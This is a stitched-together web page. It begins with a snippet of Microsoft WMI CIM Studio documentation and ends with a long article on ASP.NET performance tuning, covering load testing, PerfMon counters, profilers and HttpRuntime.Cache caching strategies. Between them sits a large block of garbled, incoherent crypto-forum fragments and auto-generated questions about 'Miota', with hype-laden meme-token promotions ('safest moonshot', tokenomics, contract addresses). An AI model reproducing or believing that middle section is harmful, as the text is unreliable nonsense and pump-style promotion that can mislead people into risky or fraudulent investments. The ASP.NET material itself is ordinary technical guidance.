text stringlengths 454 608k | url stringlengths 17 896 | dump stringclasses 91
values | source stringclasses 1
value | word_count int64 101 114k | flesch_reading_ease float64 50 104 |
|---|---|---|---|---|---|
Host a web server on the MKR WiFi 1010
In this tutorial, we will use the MKR WiFi 1010 to set up a simple web server, using the WiFiNINA library. The web server will be used as an interface for our board, where we will create two buttons to remotely turn ON or OFF an LED.
If you have never used the WiFiNINA library, you can check out this tutorial that shows how to install the library.
Hardware needed
- Arduino MKR WiFi 1010
- Micro USB cable
- Generic LED
- 82 ohm resistor
- Breadboard
- Jumper wires
Circuit
Follow the wiring diagram below to connect the LED to the MKR WiFi 1010 board.
Schematic
This is the schematic of our circuit.
Software needed
- Arduino IDE (offline and online versions available).
- Arduino SAMD core installed, follow this link for instructions.
- WiFiNINA library (explained later in this tutorial).
Let's start
This tutorial uses barely any external hardware: we have only LED that we will control remotely. But the most interesting aspects lies in the library we are going to use: WiFiNINA. This library can be used for many different connectivity projects, where we can both connect to WiFi, make GET requests and - as we will explore in this tutorial - how to create a web server.
We will go through the following steps in order to create a web server on our MKR WiFi 1010:
- First, we need to initialize the WiFiNINA library.
- Then, we connect to our local WiFi by entering our
SSID(name of network) and
PASS(password of network).
- Once connected, it will start hosting a server, and starts waiting for a client.
- If we now enter the IP address of our board in our regular browser (e.g. Chrome, Firefox) we connect as a client.
- As long as we are connected, the program detects it, and enters a
while()loop.
- In the
while()loop, two links are simply printed in HTML format, which is visible in the browser.
- These links control the LED we connected to the board, simply "ON" or "OFF".
- If we press the "ON" link, the program is configured to add an "H" to the end of the URL, or if we press the "OFF" link, we add an "L" to the end of the URL.
- If the URL ends with "H", it will turn on the LED, and if it ends with "L" it turns it off. H stands for "HIGH" and L stands for "LOW".
And that is the configuration we will be using in this tutorial. There are a few other functionalities, such as checking if we have the latest firmware and that we are using the right board, and these potential errors will be printed in the Serial Monitor.
Code explanation
NOTE: This section is optional, you can find the complete code further down this tutorial.
The initialization begins by including the WiFiNINA library, after which we need to enter our credentials to our network. If you want to, you can create a secret tab to store your credentials. This can be useful if you want to share your sketch online, and don't want anyone to see your credentials. You can find out how to do that in this tutorial.
#include <WiFiNINA.h> char ssid[] = " "; // your network SSID (name) between the " " char pass[] = " "; // your network password between the " " int keyIndex = 0; // your network key Index number (needed only for WEP) int status = WL_IDLE_STATUS; //connection status WiFiServer server(80); //server socket WiFiClient client = server.available(); int ledPin = 2;
We can then configure the
setup(). Here we set the Serial Communication to 9600, configure the
pinMode for our LED, and use the line
while(!Serial); to only initialize the rest of the program as long as we open the Serial Monitor. We do this since important information is printed in the Serial Monitor, and if we upload it, we may risk missing it. Then, we execute two functions:
enable_WiFi() and
connect_WiFi, which we will use to connect to our WiFi. We then use
server.begin() to start hosting the server, once we are connected. The final function,
printWiFiStatus() simply prints the information about the connection status in the Serial Monitor. Here, we will see the IP address we need to connect to.
void setup() { Serial.begin(9600); pinMode(ledPin, OUTPUT); while (!Serial); enable_WiFi(); connect_WiFi(); server.begin(); printWifiStatus(); }
The loop of this program is very short. First, we use
client to check if the
server is available. If it is, we execute the
printWEB() function.
void loop() { client = server.available(); if (client) { printWEB(); } }
Next up is the functions that we used in
setup(). These are
printWiFiStatus(),
enableWiFi(), and
connect_WiFi().
If we look at
printWiFiStatus(), you can see that it basically prints different things in the Serial Monitor. Most importantly, it prints the board's IP address, which we will need to enter in the browser to control the Arduino.
void printWifiStatus() { // print the SSID of the network you're attached to: Serial.print("SSID: "); Serial.println(WiFi.SSID()); // print your board's IP address: IPAddress ip = WiFi.localIP(); Serial.print("IP Address: "); Serial.println(ip); // print the received signal strength: long rssi = WiFi.RSSI(); Serial.print("signal strength (RSSI):"); Serial.print(rssi); Serial.println(" dBm"); Serial.print("To see this page in action, open a browser to http://"); Serial.println(ip); } void enable_WiFi() { // check for the WiFi module: if (WiFi.status() == WL_NO_MODULE) { Serial.println("Communication with WiFi module failed!"); // don't continue while (true); } String fv = WiFi.firmwareVersion(); if (fv < "1.0.0") { Serial.println("Please upgrade the firmware"); } } void connect_WiFi() { //); } }
Now, we will look at the core of this program: the
printWEB() function, which we call from the
loop().
Here, we first begin by checking if
client is available, and if it is, we enter a
while() loop. Inside the while loop, we will use
client.print to start printing HTML code that can be viewed from the browser. To not overload the Arduino boards memory, we use a very basic setup: two links that either turn ON or OFF an LED.
This line of code is used to turn ON the LED, by adding a /H to the end of the URL.
client.print("Click <a href=\"/H\">here</a> turn the LED on<br>");
This line of code is used to turn OFF the LED, by adding a /L to the end of the URL.
client.print("Click <a href=\"/L\">here</a> turn the LED off<br>");
We will also make a reading on an analog pin (A1). Even though we do not have anything connected, we can simply see how we can also read something connected to the board, and then print it to the client.
client.print("Random reading from analog pin: ");
client.print(randomReading);
When the printing is done, we use
break; to exit the while loop. Now, we configure the program to check whether there's a H or L added to the URL, where we use
digitalWrite(ledPin, STATE) to turn ON or OFF the LED.
void printWEB() {(); //create the links client.print("Click <a href=\"/H\">here</a> turn the LED on<br>"); client.print("Click <a href=\"/L\">here</a> turn the LED off<br>"); int randomReading = analogRead(A1); client.print("Random reading from analog pin: "); client.print(randomReading); // } if (currentLine.endsWith("GET /H")) { digitalWrite(ledPin, HIGH); } if (currentLine.endsWith("GET /L")) { digitalWrite(ledPin, LOW); } } } // close the connection: client.stop(); Serial.println("client disconnected"); } }
Complete code
If you choose to skip the code building section, the complete code can be found below:
Upload sketch and testing the program
Once we are finished with the coding, we can upload the sketch to the board. Once it is successful, open the Serial Monitor and it should look like the following image:
Copy the IP address and enter it in a browser. Now, we should see a very empty page with two links at the top left that says "Click here to turn the LED on" and "Click here to turn the LED off".
When interacting with the links, you should see the LED connected to pin 2 turn on and off depending on what you click, and we have successfully created a way of interacting with our MKR WiFi 1010 board remotely.
Troubleshoot
If the code is not working, there are some common issues we need can troubleshoot:
- We have not updated the latest firmware for the board.
- We have not installed the core required for the board.
- We have not installed the WiFiNINA library
- We have entered the SSID and PASS incorrectly: remember, it is case sensitive.
- We have selected the right port to upload: depending on what computer we use, sometimes the board is duplicated. By simply restarting the editor, this issue can be solved.
Conclusion
In this tutorial, we learned how to create a basic web interface from scratch. We learned how to control an LED remotely, and how to display the value of an analog pin in the browser as well. Using this example, we can build much more complex projects, and if you are familiar with both HTML and CSS, you can probably create some really cool looking interfaces! If you are new to HTML and CSS, there are plenty of guides online that can guide you, you can visit w3schools or codecademy for many tips and tricks.
NOTE: The memory of the Arduino MKR WiFi 1010 is not infinite. It is encouraged to use external CSS files if you are planning a bigger project, as it reduces the memory.
Tip: Check out fontawesome to get access to thousands of free icons that you can customize your local web server with!
More tutorials
You can find more tutorials for this board in the MKR WiFi 1010 getting started page.
Authors: Karl Söderby Reviewed by: Simone [18.07.2020] Last revision: 26.06.2020 | https://www.arduino.cc/en/Guide/MKRWiFi1010/hosting-a-webserver/ | CC-MAIN-2021-43 | refinedweb | 1,641 | 64.3 |
Red Hat Bugzilla – Bug 838757
xchat appears to expect an old version of python when loading plugins
Last modified: 2013-07-31 18:04:53 EDT
Description of problem:
xchat fails to load gtk-dependent python modules; in my case, pynotify.
Version-Release number of selected component (if applicable):
Name : xchat
Epoch : 1
Version : 2.8.8
Release : 13.fc17
Architecture: x86_64
How reproducible:
Attempt to load a module that imports pynotify pynotify
Steps to Reproduce:
1. Open xchat
2. /py exec import pynotify
Actual results:
xchat can't import pynotify, which fails while importing gtk:
Traceback (most recent call last):
File "<string>", line 1, in <module>
File "/usr/lib64/python2.7/site-packages/gtk-2.0/pynotify/__init__.py", line 19, in <module>
import gtk
File "/usr/lib64/python2.7/site-packages/gtk-2.0/gtk/__init__.py", line 42, in <module>
import gdk
ImportError: No module named gdk
Expected results:
xchat can import pynotify
Additional info:
I wish I could offer more info, but I lack the expertise. pynotify and gtk work outside of xchat without. | https://bugzilla.redhat.com/show_bug.cgi?id=838757 | CC-MAIN-2018-13 | refinedweb | 178 | 55.03 |
WebReference.com - Perl Module Primer (2/5)
Perl Module Primer
Let's begin our basic module analysis with a look at a basic module:
package SayHello; sub hello_message { return "Hello, World!"; } 1;
That's about as basic as you can get, but even in this simplest of examples you probably see some things that confuse you, or that you haven't encountered before. So let's take a closer look.
The Package
Each module contains a package declaration--usually as the first statement of the file--and this package declaration must match the name of the file itself (the file will additionally have a ".pm" extension; so, in our example above, the module would reside in a file called "SayHello.pm"). Technically, package names follow Perl rules for variable naming; but when used as a module the standard convention is to begin your package name with an upper-case letter, to avoid conflicts with Perl pragmas, which we will later see are invoked in Perl scripts via the same mechanism used by modules. Additionally, when selecting a name for your private packages, such as a package that you'll be using strictly within your own organization and not for public release, you should try to pick a name that won't conflict with other public packages that you might want to use in the future; and that also conforms to the naming conventions for files on your operating system (remember that for module development, the package name will also be the name of the file that contains the module code, with an added .pm extension). One possibility is to use an underscore in your package name, since publicly available packages typically do not contain underscores. So our example module above might become "Say_Hello." And, down the road, if you decide you'd like to contribute your own modules for public consumption, you can (and should) enlist the help of the Perl community at large to help you decide how to name your new module (and you may even find other authors and/or modules that may benefit from your work, or that can assist you directly). Many helpful hints on public module naming and creation can be found on CPAN. But for now, let's continue our basic analysis with a brief definition of packages.
So what exactly is a package? A package is a way to separate chunks of Perl code from each other so that their namespaces do not collide. In brief, a namespace represents the collected symbols--i.e., variable names, sub routine names, etc.--that a script is aware of. In your single script applications you probably didn't need to worry about namespaces much; since you could easily know what variables and sub routine names you had defined and could therefore avoid attempting to redefine a name that was already in use. But remember that a module is intended to be a separate, reusable code block; it may be used in many scripts that we do not have any control over in the future. Packages allow us to code our module using our own variable and routine names without having to worry about inadvertently clobbering someone else's variables, such as an employee of our company who decides to use our module to add functionality to their own script--in the future.
While within a specific Perl package declaration, your script will have direct access only to the variables and functions defined within that package. By "direct access," I mean the ability to refer to the variables without any specific qualification; such as
$myVariable="foobar"; print $myVariable;
There are, however, "indirect" ways to access and use certain variables and functions in a module, and we'll discuss them on the next page (indeed, if there weren't, there wouldn't be much point in writing a module in the first place!)
By the way, I realize that many of the "rules" I'm presenting to you in this brief article have exceptions that I'm not delving into purely in the interest in keeping this tutorial as simple as possible. For example, a package declaration is not restricted to appearing only in modules; in fact, it can appear in any section of code, at any time, can span multiple files, and multiple package declarations can even appear in a single module file. But a common use for package declarations is to separate the namespaces of individual modules (and to define classes when used in an OOP context) as above; so that's the usage we're focusing on here.
Where's the Code?
You may have noticed that our simple module above has no actual executing code; only a single sub routine definition that itself is never called. So what good is it?
Remember that modules are not intended to be standalone applications; we'll never actually be running our module by itself. Instead, we'll be using our module to provide added functionality to a larger script (and, more than likely, many separate scripts) and therefore it is common for a module to contain a series of sub routine definitions but little or no actual execution code. This is not a rule, however; a module can have its own executing code, such as "global" (global to the module, that is) variable definitions and initializations. Just remember that this code--whatever it is--will be executed by every script that uses this module (and, in fact, will be executed before the script that calls it is even compiled; more on that later).
Return true.
While it's admittedly not at all useful (not many "Hello World" applications are) our module above is a complete, working construct, ready to be reused without modification in as many scripts as needed. But how do we actually use it in our own code? Chances are very good that you already know how...
Created: April 7, 2005
Revised: April 7, 2005
URL: | http://www.webreference.com/programming/perl/modules/2.html | CC-MAIN-2015-32 | refinedweb | 992 | 52.94 |
Visualize data from CSV file in Python
In today’s world, visualizing data is an important part of any domain. Visualized data is easy to understand that is why it is preferred over excel sheets. Python came to our rescue with its libraries like pandas and matplotlib so that we can represent our data in a graphical form.
In this tutorial, we will be learning how to visualize the data in the CSV file using Python.
Visualize a Data from CSV file in Python
First of all, we need to read data from the CSV file in Python.
Now since you know how to read a CSV file, let’s see the code.
import pandas as pd import matplotlib.pyplot as plt csv_file='data.csv' data = pd.read_csv(csv_file)
We have imported matplotlib. It will be used for data visualization.
Let’s see our data.
We will now extract Genre and TotalVotes from this dataset.
Votes = data["TotalVotes"] Genre = data["Genre"]
Now, we will store these data into two different lists. We need to create two empty lists first.
x=[] y=[]
We will use a method list() which converts a dataset into Python list.
x=list(Genre) y=list(Votes)
If we print x and y, we get
x=['Biography', 'Action', 'Romance', 'Comedy', 'Horror'] y=[65, 75, 80, 90, 60]
matplotlib lets us draw different types of graphs like,
- Bar charts and Histograms
- Scatter plot
- Stem plots
- Line plots
- Spectrograms
- Pie charts
- Contour plots
- Quiver plots
Today, We will see a scatter plot, bar chart, and pie chart.
Scatter Plot from CSV data in Python
To draw a scatter plot, we write
plt.scatter(x,y) plt.xlabel('Genre->') plt.ylabel('Total Votes->') plt.title('Data') plt.show()
xlabel and ylable denote the type of data along the x-axis and y-axis respectively.
plt.title allows us to mention a title for our graph.
To show the graph, we use a function show().
This is our scatter plot.
Bar Plot from CSV data in Python
Similarly, for a bar chart:
plt.bar(x,y)
We get,
bar plot
Pie Chart from CSV Data in Python
And for the pie chart, we write:
plt.pie(x,labels=y,autopct='%.2f%%')
Here, label is used to provide a name inside the respective portion in the chart.
autopct shows the percentage for each portion.
pie chart
So, this is how we can visualize our data using Python. If you have any doubts, don’t forget to mention them in the comment section below.
Also, learn:
- Plotting sine and cosine graph using matloplib in python
- Print frequency of each character in a string in Python
Correction: plt.pie(y,labels=x,autopct=’%.2f%%’)
Hi, I tried this code, but the problem is that the kernel keeps running after the plt.show() command. Do you perhaps have an idea how to solve this problem?
Hello,
I’m getting error :-
ValueError: could not convert string to float: ’01 Laptop’
Code :-
csv_file=’tabuladata.csv’
data = pd.read_csv(csv_file)
Item = data[“Item”]
Price = data[“Price”]
x=[]
y=[]
x=list(Item)
y=list(Price)
plt.pie(x,labels=y,autopct=’%.2f%%’)
plt.show()
Probably I need to convert the data type or I messed up with something else. | https://www.codespeedy.com/visualize-data-from-csv-file-in-python/ | CC-MAIN-2020-45 | refinedweb | 540 | 75 |
File::HTTP - open, read and seek into remote files and directories transparently
use File::HTTP qw(:open); # open and read a remote file (server must allow range queries) open(my $fh, '<', '') or die $!; while (<$fh>) { chomp; ... } # remote file is seekable in all directions seek($fh, 500, 0); read($fh, my $buf, 40); seek($fh, -40, 1); read($fh, my $buf2, 40); # $/ behaves as with regular files local $/ = \52; $buf = <$fh>; # also works with https addresses if IO::Socket::SSL is available open(my $fh, '<', '') or die $!; # open() still works as expected with local files open(my $fh, '<', "local_file") or die $!; # directory (when servers allow directory listing) use File::HTTP qw(:opendir); opendir(my $dirh, '') or die $!; while (my $file = readdir($dirh)) { next if $file =~ /^\.\.?$/; open(my $fh, '<', "") or die $!; ... } # open remote file, but not seekable # works with all web servers, and faster (real filehandler) use File::HTTP qw(open_stream); my $fh = open_stream('') or die $!; while (<$fh>) { chomp; ... } # make your module HTTP compatible when File::HTTP is installed. # on top of module: eval {use File::HTTP qw(:open)};
File::HTTP open, read and seek into remote files and directories transparently
Imported with the :open or :all tags.
Act exaclty as CORE::open and CORE::stat, but also work with remote HTTP files.
Falls back to CORE::open and CORE::stat when the path looks like a local file.
Returns a Tied filehanlder when opening a remote file.
Only works with Web servers that allow range queries (see CAVEATS).
You should use
open_stream when servers do not allow range queries.
Imported with the :opendir or :all tags.
Act exaclty as CORE::opendir and associated CORE functions, but also work with remote HTTP directories.
Falls back to CORE::opendir when the path looks like a local directory.
Returns a Tied filehanlder when opening a remote directory.
Only works with Web servers that allow directory listing.
open a readable but not seekable filehandle to the specified URL
context dependent slurping of an url
my $content = slurp_stream($url); my @lines = slurp_stream($url);
slurps an url into a string, also also returning request and response headers strings in list context. Contrary to slrup_stream, default behavior is to ignore redirections
my $body = get($url); my $body = get($url, 1); # follow redirections my ($request_headers, $response_headers, $body) = get($url);
If set to follow redirections, $request_headers and $response_headers will correspond to the last emitted request.
Nothing by default. Functions can be imported explicitely
use File::HTTP qw(open open_stream opendir readdir);
:open and :opendir tags are much prefered as they will ensure all needed functions are exported
use File::HTTP qw(:open); # same as: use File::HTTP qw(open stat); use File::HTTP qw(:opendir); # same as: use File::HTTP qw(opendir readdir rewinddir telldir seekdir closedir);
You can use the :all tag to import all functions
use File::HTTP qw(:all);
You can also use the -everywhere tag to export emulation function into all namespaces (dangerous!)
use File::HTTP qw(-everywhere); # now all modules shall magicaly work with remote files (or not)
openonly works with remote web server and ressources that allow range queries.
Dynamic ressources such as PHP or CGI typically do not work with range queries.
open_streamdoes not have such limitations, but does not allow seeks.
opendironly works with remote web servers and ressources that allow directory listing, and list files as a simple <a href> links.
Thomas Drugeon, <tdrugeon@cpan.org>
This library is free software; you can redistribute it and/or modify it under the same terms as Perl itself, either Perl version 5.14.2 or, at your option, any later version of Perl 5 you may have available. | http://search.cpan.org/dist/File-HTTP/lib/File/HTTP.pod | CC-MAIN-2016-36 | refinedweb | 605 | 62.38 |
03 December 2012 18:00 [Source: ICIS news]
HOUSTON (ICIS)--Here is Monday’s midday ?xml:namespace>
CRUDE: Jan WTI: $89.22/bbl, up 31 cents; Jan Brent: $111.09/bbl, down 14 cents
NYMEX WTI crude futures attempted to extend recent gains, but the rally was capped as the stock market worked lower following the release of a report showing
RBOB: Jan: $2.7486, up 1.83 cents/gal
Reformulated gasoline blendstock for oxygen blending (RBOB) prices traded higher mid-day as more buyers came into the market on the first day of trading on the January RBOB contract as the prompt month.
NATURAL GAS: Jan: $3.593/MMBtu, up 3.2 cents
Natural gas futures were recovering slightly this morning after two successive sessions of sell-offs on Thursday and Friday as warm temperature outlooks and high inventory levels stung any traction on the Henry Hub benchmark.
ETHANE: lower at 26.00 cents/gal
Ethane prices fell in early trading on Monday, setting another record low.
AROMATICS: benzene flat at $4.87-4.95/gal
US benzene prices discussions were thin early in the day. As a result, spot prices were unchanged from Friday.
OLEFINS: ethylene offered flat at 51.375 cents/lb, RGP flat at 49.00-49 | http://www.icis.com/Articles/2012/12/03/9620679/noon-snapshot-americas-markets-summary.html | CC-MAIN-2015-11 | refinedweb | 211 | 68.16 |
As I am currently working on some GUI applications to take input in to text boxes, I have decided to enhance these programs a little further.
The above program in the form it was when the screen shot was taken, didn’t take in to account what was actually entered in to the text box, it could be blank, have text neither of which is going to produce any useful output (if any)
number = raw_input("Enter a number ") i = number.isdigit() while i != True: print("Input MUST be a number") number = raw_input("number of sides to shape ") i = number.isdigit() print number
Taking the isdigit function, I found a few months ago, I set about integrating this with the code for the program above, this took a bit of trial and error but it now works in so far that if anything other than a numerical value is entered, then the entry box displays and error message. Another consequence of this, is that if the entry box is blank (null) then the same thing happens.
So I have now added the code for this,
def test(): msg = "error : must be a numerical value" i = testbox.get() y = i.isdigit() if y != True: testbox.insert(0,(msg)) else: x = int(testbox.get()) #get user input testbox.delete(0, END) # clear user input testbox.insert(0,bin(x)) # print user input converted in to requried base
Before I set about doing this to my actual base converter program (screenshot) I wrote a program that had a window, text entry box and a button, so that I could test everything out. It worked so I then integrated it in to my program and changed variables , object names to suit.
Adding checking like this is important, as it reduces problems with programs.
The same idea could be achieved if text is required as the fuction isalpha is u sed to check if something is alphabetical.
Also if you are going to add new features to something if you can write a stand alone program to make sure it works then that really helps. I have the basic input test program in 2 versions one text based and one graphical, it adds to my library of routines and solutions that can be called upon at a later date if I need to use them in future projects.
As always any questions please e-mail me or tweet me at @zleap14
I will be at the Exeter Pi jam on the 7th and the Torbay Pi jam on the 14 of June. | http://zleap.net/gui-programming-10-error-checking/ | CC-MAIN-2019-04 | refinedweb | 426 | 66.67 |
On Tue, 19 Feb 2008, Geert Uytterhoeven wrote: > On Tue, 19 Feb 2008, Petr Stehlik wrote: > > Petr Stehlik wrote: > > > GeOW, if I set the DefaultDepth to 16 and use the cfb16 driver will it know how > > to switch the framebuffer to Falcon truecolor mode? > > Yes it should. Finally I managed to get fbset and fbtest (from sf.net CVS) through the network into my virtual Atari. I fixed 2 brown paper bag bugs in fbtest, which now works fine in all modes (interleaved bitplanes at 1/2/4/8 bpp and packed pixels at 16 bpp). So in theory, X should work in 16 bpp mode, too.. Oh well, may the all night hackers fix it ;-) --- drivers/video/atafb.c | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) --- a/drivers/video/atafb.c +++ b/drivers/video/atafb.c @@ -2549,6 +2549,13 @@ static void atafb_fillrect(struct fb_inf if (!rect->width || !rect->height) return; +#ifdef ATAFB_FALCON + if (info->var.bits_per_pixel == 16) { + cfb_fillrect(info, rect); + return; + } +#endif + /* * We could use hardware clipping but on many cards you get around * hardware clipping by writing to framebuffer directly. @@ -2583,6 +2590,13 @@ static void atafb_copyarea(struct fb_inf u32 dx, dy, sx, sy, width, height; int rev_copy = 0; +#ifdef ATAFB_FALCON + if (info->var.bits_per_pixel == 16) { + cfb_copyarea(info, area); + return; + } +#endif + /* clip the destination */ x2 = area->dx + area->width; y2 = area->dy + area->height; @@ -2629,6 +2643,13 @@ static void atafb_imageblit(struct fb_in const char *src; u32 dx, dy, width, height, pitch; +#ifdef ATAFB_FALCON + if (info->var.bits_per_pixel == 16) { + cfb_imageblit(info, image); + return; + } +#endif + /* * We could use hardware clipping but on many cards you get around * hardware clipping by writing to framebuffer directly like we | https://lists.debian.org/debian-68k/2008/02/msg00170.html | CC-MAIN-2017-17 | refinedweb | 277 | 62.68 |
-
List<String> items = new ArrayList<String>(Arrays.asList("Frist".split(","))) String itemOne = items[2].toString()
Admin
It's converting from a one-based array to a zero-based array, perhaps:
itemZero = items[1].toString()
posterior-brained way of doing it, I'll admit ...
Admin
... or perhaps the first couple of elements are placeholders of some kind, or otherwise ignorable elements.
Still doesn't excuse it's fundament-headedness.
Admin
Well, well well...
Apparently you live under a rock and haven't had much to do with CI engines... Groovy is very much alive and kicking...
Not a quality WTF more than a rant about being ignorant... I expect much better from this site!
Admin
I'd say it's a decent-quality WTF, in the sense that anybody unfamiliar with Groovy (me, for instance) is going to go "WTF?"
The fact that Remy is concerned with something as piffling as a variable name, when the very same line seems to need toString() to "convert" something that has apparently been extracted from a collection of String into, er, a String .... well, either this example is even more borked than it looks, or else three familiar letters spring to mind.
Admin
TRWTF is that Groovy is supposed to be a dynamic language. Instead, the code in this example looks very much like Java, except the items[2] that would be items.get(2) in Java.
Admin
The first line could actually make sense, if the original coder wanted to append or remove elements from the list later on.
split() returns an array, so to modify its length, you need to convert it into a list. That's why Arrays.asList() is there. However, you still can't modify the resulting ArrayList, because the instance is of a specific subclass that's unmodifiable. If you want a "real" ArrayList, you've got to feed the result of Arrays.asList() to "new ArrayList<>()".
The real WTFs I see in the first line of this code are 1. that split() returns an array and 2. ArrayList doesn't have a varargs constructor, but you'd have to blame that on Java, not Groovy itself.
Another WTF is that this is meant to be an example for Groovy while it's not even using Groovy syntax. Converted to Groovy, this code would look like this:
def items = string.split(",") as ArrayList def itemOne = item[2]
Addendum 2017-07-31 07:28: Edit: The last line is missing a line break after ArrayList.
Admin
Without knowing what else is being done with "items", it's hard to call this a big WTF... this is also almost 100% Java code (which is also perfectly valid groovy). The final toString() is unnecessary, but certainly not really deserving of a whole article.
Admin
The WTF here isn't Groovy. The code shown is Java, which is a subset of Groovy. Only a Java programmer would program like this in Groovy. In Groovy, you can simply do:
def items = data.split(",") as List def item = list[2]
If you care about typing, you could make it:
List<String> items = data.split(",") as List // or possibly as List<String>, it's been a while since I've done Groovy.
The WTF about the itemOne = items[2] has nothing to do with Groovy or Java; it's just a programmer being silly, which you can do in any language.
Admin
I guess the real WTF is that thedailyWTF's editor starts adding
tags only halfway through my post, and adds closing </string> tags at the end because I'm discussing generics.
Admin
Also itemOne might be perfectly reasonable, as the first useful item in a list of things, the first couple of entries could be unneeded identifiers and this field is actual what they are interested in. I think the WTF is that the WTF is not a WTF.
Admin
Yeah... I wouldn't put this one on the language, but on the programmer being an idiot.
In java, just as in groovy, all this mess can be written as:
String itemTwo = data.split(",")[2];
Admin
Careful. Down that slipperly slope lie people excusing PHP as "it's not the language but all the idiots using it".
Admin
Seems like the biggest problem is not checking whether the List we came up with actually has two or more items before indexing into it?
But, then again, not knowing this use, maybe throwing an exception is the right thing to do if you have a short list,
Admin
but it IS the idiots using (abusing) it. not that I care, I work in a Real Language
Admin
Definitely weak. I thought my recent submission might've been a little on the weak side but if this is all the higher they're setting the bar...
Admin
+1. STILL waiting for mine.
Admin
I have to write groovy occasionally for Jenkins integration. It is by far the most interesting programming language to try to google. My favorite is the time I was trying to connect to an SMB share from a Jenkins job, and it was a Linux host, so naturally I googled "groovy samba."
Admin
and item should be items?
Admin
Seems like run of the mill (but poorly written) Java. Assuming you're not interested in adding out-of-bound checks, the code can be reduced to:
Admin
FTFY
Admin
Ah yes. The infamous off-by-two error. A very common and easily made mistake.
Admin
Not much different than this semi sanitized code snippet I've come across many times:
Admin
Groovy is a dumb language. I got one bug:
In Ruby: a hash (map ) is {}, while a list is [].
In Groovy, a map with one element is ['a':'b']. When I tried to make an empty map, I used []. Turned out it was a stupid list.
I hated Groovy from that day.
Admin
Probably not.
I suspect that there is a good reason why items is defined as an ArrayList rather than a native array. Most likely so it can be updated later on in the code.
really, the only thing that's odd here is why the developer is casting it to an ArrayList<String> when Arrays.asList already returns a List, and items is defined as a List. | https://thedailywtf.com/articles/comments/groovy-typing-man | CC-MAIN-2017-43 | refinedweb | 1,049 | 74.39 |
Hello go on create a fresh project and copy this following code to it.
package com.TTS; import java.util.Locale; import android.app.Activity; import android.os.Bundle; import android.speech.tts.TextToSpeech; public class TTS("eng", "",""); if(tts.isLanguageAvailable(loc) >= TextToSpeech.LANG_AVAILABLE){ tts.setLanguage(loc); } tts.speak("Text to speech in ANDROID from coderzheaven, Hope you like it.", TextToSpeech.QUEUE_FLUSH, null); } @Override protected void onDestroy() { super.onDestroy(); tts.shutdown(); } }
After running this application you will hear the sound that is given as text in this line.
tts.speak(“Text to speech in ANDROID from coderzheaven, Hope you like it.”, TextToSpeech.QUEUE_FLUSH, null);
Please leave your comments if this post was useful.
Great info dude thanks for useful article. I’m waiting for more
@tabletki na odchudzanie-> thank you so much… We are working more on Android, iPhone and other related stuffs… we will update with other useful resources from these… Keep in touch… and once again thank you for your support… 🙂
its nice.
i need to display that text in emulator.can any1 help me | http://www.coderzheaven.com/2011/04/09/text-to-speech-in-android-a-simple-illustration/?replytocom=436 | CC-MAIN-2019-35 | refinedweb | 177 | 61.33 |
Write a class named FileDisplay with the following methods:
1.) constructor: the class's constructor should take the name of a fil as an arugment.
2.) displayHead: This method should display only the first five lines of the file's contents
Here is the following code I have made so far
import java.io.*; public class FileDisplay { private String filename; public FileDisplay(String Filename) throws IOException { filename=Filename; FileWriter file=new FileWriter(filename); PrintWriter fout=new PrintWriter(filename); } public void displayHead() { } }
First, in my constructor I have taken in an argument and used that argument to open up an output file. Meanwhile, I'm trying to work n the displayhead method to print out information and to read data to. I haven't opened up my input file yet, but I'm not understand how can I read a print data to an output file. indo I make create another instance of the filewriter class to output data?do I make create another instance of the filewriter class to output data?public void displayHead() {FileWriter file=new FileWriter(Filename)}
--- Update ---
Im simple words, suppose to I want to display some messages on my output file in the displayhead function. Since I already have opened up the file in the constructor, how do I combine that in this method... | http://www.javaprogrammingforums.com/whats-wrong-my-code/36481-filedisplay-class.html | CC-MAIN-2014-52 | refinedweb | 218 | 59.43 |
Introduction to Python Extend
Python extends is a great feature in python. It’s a keyword as well as a method also. We can use python extend to extend any class and its features into existing code. It is also called inheritance in the object-oriented paradigm. Extend is also an inbuilt method in python that can be used with a list or array to extend the items inside it. It is almost a similar append method of the list.
When we use the extend method for array it will take two arrays and append another array at the end of the first array. Append also works in a similar way but in case of append, it creates nested array while the extend method does not create nested array it adds elements of the second array in the first array.
Syntax:
array_one.extend(array_two)
Examples of Python Extend
Examples of python extend are:
Example #1 – Extending an Array
Code:
import array as arr
arr1 = arr.array('i', [1,2,3,4])
arr2 = arr.array('i', [5,6,7])
arr1.extend(arr2)
print(arr1)
Output:
In the above program, we have imported the array module and we have given an alias name as ‘arr’ to it. We created two array arr1, arr2. These are of an integer type of array. Then we have used the extend method. We are using arr1 as the main array because we want to extend arr1 with elements of arr2. We have passed both the array and then in an output, you can see that we have elements of both the arrays.
Example #2 – Extending a List
Code:
a = [1,2,3,4,5]
b = [6,7]
a.extend(b)
print(a)
Output:
In the above program, we have created two lists a and b. Both the list have an integer type of elements. Then we are extending list ‘a’ with the elements of list ‘b’. In the output, you can see all the elements of list b are extending into list a.
Example #3
Code:
a = [2010,2011,2012]
b = ['john','doe',2013]
a.extend(b)
print(a)
Output:
In the above program, you can see that we have created the two lists, in the second list we have added both integer and string values. The Extend method works well with both integer and string elements in the same list. As you can see in the output first list is extended.
Extend method only works if the items passed are iterable. Iterable means it can be looped. If the list is having a single element then also it is iterable. But we have tried to pass the value directly inside the extend method then it will generate errors.
Example #4
Code:
a = [2010,2011,2012]
a.extend(5)
print(a)
Output:
As you can see, we have passed value instead of a list in the extend method and it has returned an error “object is not iterable”. The value we have passed is an integer but if we have passed a string value then extend method will work fine because the string is a collection of characters.
Example #5
Code:
a = [2010,2011,2012]
a.extend("John")
print(a)
Output:
As you can see in the above example, we have passed a string value instead of a list but still, it works. Extend method treats string value as a collection of characters and they are iterable. So we can say that strings are iterable. The output might not be as we wanted as it has separated every character of the string. But we have executed the above using the append method then we will get the desired result. The append method won’t separate each string.
Conclusion
Python extend feature is a very useful method when we already have an array or list and we want to add more elements inside it. With the extend method we can easily do it without doing any kind of element and inserting element one by one. It will add all the elements in one go.
Recommended Articles
This is a guide to Python Extend. Here we discuss the Introduction of python extend along with different examples and its code implementation. you may also have a look at the following articles to learn more – | https://www.educba.com/python-extend/?source=leftnav | CC-MAIN-2021-04 | refinedweb | 715 | 73.58 |
CIM Studio
The easiest tool for browsing WMI is CIM Studio. CIM Studio is available as part of the WMI tools, which are available from the Microsoft Web site at.
After you install the WMI SDK, you can start CIM Studio from the WMI SDK program group. CIM Studio prompts you for the name of a namespace. If you are not sure which namespace to use, you can click Browse for Namespace. An explanation of how SMS uses WMI namespaces is listed in the "How SMS Uses WMI" section earlier in this appendix. In the Browse for Namespace dialog box, click Connect, and then click OK.
